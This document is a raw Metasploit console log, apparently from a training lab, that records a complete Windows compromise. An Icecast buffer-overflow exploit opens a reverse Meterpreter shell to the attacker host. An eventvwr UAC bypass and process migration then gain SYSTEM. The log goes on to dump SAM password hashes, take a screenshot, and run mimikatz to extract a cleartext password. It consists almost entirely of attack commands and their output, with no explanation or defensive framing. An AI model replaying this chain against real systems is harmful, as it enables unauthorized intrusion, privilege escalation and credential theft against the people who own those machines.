[1m[34m[*][0m Spooling to file /root/Desktop/Metasploit-loggs...
[4mmsf5[0m [0m> search icecast
[0m
Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite


[4mmsf5[0m [0m> use 0
[0m[4mmsf5[0m exploit([1m[31mwindows/http/icecast_header[0m) [0m> info
[0m
       Name: Icecast Header Overwrite
     Module: exploit/windows/http/icecast_header
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2004-09-28

Provided by:
  spoonm <spoonm@no$email.com>
  Luigi Auriemma <aluigi@autistici.org>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   8000             yes       The target port (TCP)

Payload information:
  Space: 2000
  Avoid: 3 characters

Description:
  This module exploits a buffer overflow in the header parsing of 
  icecast versions 2.0.1 and earlier, discovered by Luigi Auriemma. 
  Sending 32 HTTP headers will cause a write one past the end of a 
  pointer array. On win32 this happens to overwrite the saved 
  instruction pointer, and on linux (depending on compiler, etc) this 
  seems to generally overwrite nothing crucial (read not exploitable). 
  This exploit uses ExitThread(), this will leave icecast thinking the 
  thread is still in use, and the thread counter won't be decremented. 
  This means for each time your payload exits, the counter will be 
  left incremented, and eventually the threadpool limit will be maxed. 
  So you can multihit, but only till you fill the threadpool.

References:
  https://cvedetails.com/cve/CVE-2004-1561/
  OSVDB (10406)
  http://www.securityfocus.com/bid/11271
  http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html

[4mmsf5[0m exploit([1m[31mwindows/http/icecast_header[0m) [0m> show options 
[0m
Module options (exploit/windows/http/icecast_header):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   8000             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


[4mmsf5[0m exploit([1m[31mwindows/http/icecast_header[0m) [0m> setg rhosts 19[K0.10.14[K36.243
[0mrhosts => 10.10.136.243
[4mmsf5[0m exploit([1m[31mwindows/http/icecast_header[0m) [0m> run
[0m
[1m[34m[*][0m Started reverse TCP handler on 10.10.94.46:4444 
[1m[34m[*][0m Sending stage (180291 bytes) to 10.10.136.243
[1m[34m[*][0m Meterpreter session 1 opened (10.10.94.46:4444 -> 10.10.136.243:49174) at 2020-05-02 14:56:38 +0000

[0m[4mmeterpreter[0m > [0m[0mgetuid
[0mServer username: Dark-PC\Dark
[4mmeterpreter[0m > getpid
[0mCurrent pid: 2276
[4mmeterpreter[0m > migrate [K[K[K[K[K[K[K[Kps
[0m
Process List
============

 PID   PPID  Name                  Arch  Session  User          Path
 ---   ----  ----                  ----  -------  ----          ----
 0     0     [System Process]                                   
 4     0     System                                             
 416   4     smss.exe                                           
 544   536   csrss.exe                                          
 584   692   svchost.exe                                        
 592   536   wininit.exe                                        
 604   584   csrss.exe                                          
 620   692   mscorsvw.exe                                       
 652   584   winlogon.exe                                       
 692   592   services.exe                                       
 700   592   lsass.exe                                          
 708   592   lsm.exe                                            
 816   692   svchost.exe                                        
 884   692   svchost.exe                                        
 932   692   svchost.exe                                        
 1020  692   svchost.exe                                        
 1056  692   svchost.exe                                        
 1104  692   sppsvc.exe                                         
 1136  692   svchost.exe                                        
 1312  1020  dwm.exe               x64   1        Dark-PC\Dark  C:\Windows\System32\dwm.exe
 1324  1304  explorer.exe          x64   1        Dark-PC\Dark  C:\Windows\explorer.exe
 1364  692   spoolsv.exe                                        
 1400  692   svchost.exe                                        
 1432  692   taskhost.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\taskhost.exe
 1504  692   taskhost.exe                                       
 1556  816   WmiPrvSE.exe                                       
 1560  692   amazon-ssm-agent.exe                               
 1652  692   LiteAgent.exe                                      
 1688  692   svchost.exe                                        
 1768  584   WMIADAP.exe                                        
 1836  692   Ec2Config.exe                                      
 2012  816   WmiPrvSE.exe                                       
 2088  692   svchost.exe                                        
 2276  1324  Icecast2.exe          x86   1        Dark-PC\Dark  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
 2284  692   mscorsvw.exe                                       
 2288  692   vds.exe                                            
 2516  692   TrustedInstaller.exe                               
 2572  692   SearchIndexer.exe                                  

[4mmeterpreter[0m > ps |1[K[K1 [K[K| spools[K[K[K[K[K[Kgrep spool.[Ksv
[0mFiltering on 'spoolsv'

Process List
============

 PID   PPID  Name         Arch  Session  User  Path
 ---   ----  ----         ----  -------  ----  ----
 1364  692   spoolsv.exe                       

[4mmeterpreter[0m > migrate 1364
[0m[1m[34m[*][0m Migrating from 2276 to 1364...
[1m[31m[-][0m Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
[4mmeterpreter[0m > background 
[0m[1m[34m[*][0m Backgrounding session 1...
[4mmsf5[0m exploit([1m[31mwindows/http/icecast_header[0m) [0m> search bypassuac_eventvwr
[0m
Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/windows/local/bypassuac_eventvwr  2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)


[4mmsf5[0m exploit([1m[31mwindows/http/icecast_header[0m) [0m> use 0
[0m[4mmsf5[0m exploit([1m[31mwindows/local/bypassuac_eventvwr[0m) [0m> info
[0m
       Name: Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
     Module: exploit/windows/local/bypassuac_eventvwr
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-08-15

Provided by:
  Matt Nelson
  Matt Graeber
  OJ Reeves

Available targets:
  Id  Name
  --  ----
  0   Windows x86
  1   Windows x64

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module will bypass Windows UAC by hijacking a special key in 
  the Registry under the current user hive, and inserting a custom 
  command that will get invoked when the Windows Event Viewer is 
  launched. It will spawn a second shell that has the UAC flag turned 
  off. This module modifies a registry key, but cleans up the key once 
  the payload has been invoked. The module does not require the 
  architecture of the payload to match the OS. If specifying 
  EXE::Custom your DLL should call ExitProcess() after starting your 
  payload in a separate process.

References:
  https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
  https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1

[4mmsf5[0m exploit([1m[31mwindows/local/bypassuac_eventvwr[0m) [0m> show options 
[0m
Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


[4mmsf5[0m exploit([1m[31mwindows/local/bypassuac_eventvwr[0m) [0m> setg session 1
[0msession => 1
[4mmsf5[0m exploit([1m[31mwindows/local/bypassuac_eventvwr[0m) [0m> run
[0m
[1m[34m[*][0m Started reverse TCP handler on 10.10.94.46:4444 
[1m[34m[*][0m UAC is Enabled, checking level...
[1m[32m[+][0m Part of Administrators group! Continuing...
[1m[32m[+][0m UAC is set to Default
[1m[32m[+][0m BypassUAC can bypass this setting, continuing...
[1m[34m[*][0m Configuring payload and stager registry keys ...
[1m[34m[*][0m Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[1m[32m[+][0m eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[1m[34m[*][0m Cleaning up registry keys ...
[1m[34m[*][0m Exploit completed, but no session was created.
[4mmsf5[0m exploit([1m[31mwindows/local/bypassuac_eventvwr[0m) [0m> run
[0m
[1m[34m[*][0m Started reverse TCP handler on 10.10.94.46:4444 
[1m[34m[*][0m UAC is Enabled, checking level...
[1m[32m[+][0m Part of Administrators group! Continuing...
[1m[32m[+][0m UAC is set to Default
[1m[32m[+][0m BypassUAC can bypass this setting, continuing...
[1m[34m[*][0m Configuring payload and stager registry keys ...
[1m[34m[*][0m Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[1m[32m[+][0m eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[1m[34m[*][0m Sending stage (180291 bytes) to 10.10.136.243
[1m[34m[*][0m Meterpreter session 2 opened (10.10.94.46:4444 -> 10.10.136.243:49180) at 2020-05-02 14:58:07 +0000
[0m[0m[1m[34m[*][0m Cleaning up registry keys ...

[0m[4mmeterpreter[0m > getpi[Kuid
[0m[1m[31m[-][0m Unknown command: getpuid.
[4mmeterpreter[0m > getuid
[0mServer username: Dark-PC\Dark
[4mmeterpreter[0m >  [K [Kps | spoolsv
[0mFiltering on 'spoolsv'

Process List
============

 PID   PPID  Name         Arch  Session  User                 Path
 ---   ----  ----         ----  -------  ----                 ----
 1364  692   spoolsv.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe

[4mmeterpreter[0m > migrate 1364
[0m[1m[34m[*][0m Migrating from 2404 to 1364...
[1m[34m[*][0m Migration completed successfully.
[4mmeterpreter[0m > getuid
[0mServer username: NT AUTHORITY\SYSTEM
[4mmeterpreter[0m > gert[K[Ktpid
[0mCurrent pid: 1364
[4mmeterpreter[0m > help
[0m
Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user's desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

[4mmeterpreter[0m > hashdump 
[0mAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[4mmeterpreter[0m >  [K [Kscreenshot /root/Deskr[Ktop/Screenshit[K[KotOfRemoteComputer
[0mScreenshot saved to: /root/PVvGOkWC.jpeg
[4mmeterpreter[0m >  [K [Kload kiwi
[0mLoading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
[4mmeterpreter[0m > creds_[K[K[K[K[K[Khelp
[0m
Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user's desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes


Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

[4mmeterpreter[0m > cred_[Ks_all 
[0m[1m[32m[+][0m Running as SYSTEM
[1m[34m[*][0m Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)


[4mmeterpreter[0m >  [K [Kget[K[K[Klao[K[K[K